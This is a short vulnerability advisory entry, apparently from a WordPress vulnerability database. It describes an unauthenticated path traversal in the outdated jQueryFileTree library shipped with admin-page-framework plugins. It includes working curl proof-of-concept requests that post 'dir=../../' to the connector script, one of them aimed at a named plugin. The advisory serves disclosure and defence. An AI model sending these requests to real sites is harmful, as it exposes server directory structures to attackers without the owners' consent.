Lucene search

K
wpexploitWpvulndbWPEX-ID:063A4A32-E813-4929-9833-B2CE197C94AE
HistoryMar 01, 2022 - 12:00 a.m.

Folders Disclosure via Outdated jQueryFileTree Library

2022-03-0100:00:00
wpvulndb
102
outdated library
folders disclosure
jqueryfiletree
exploit
directory traversal

EPSS

0.703

Percentile

98.0%

The plugins are using the admin-page-framework framework which is shipped with the outdated and no longer maintained library jQueryFileTree known to be affected by a path traversal issue, allowing unauthenticated attackers to disclose the folder structure of the web server

curl 'https://example.com/wp-content/plugins/<affected-plugin>/<path-to-jQueryFileTree-lib>/connectors/jqueryFileTreePlus.php' -d "dir=../../" -e "xx"

e.g: curl 'https://example.com/wp-content/plugins/revision-manager-tmc/vendor/tmc/admin-page-framework/custom-field-types/path-custom-field-type/connectors/jQueryFileTreePlus.php' -d "dir=../../" -e "xx"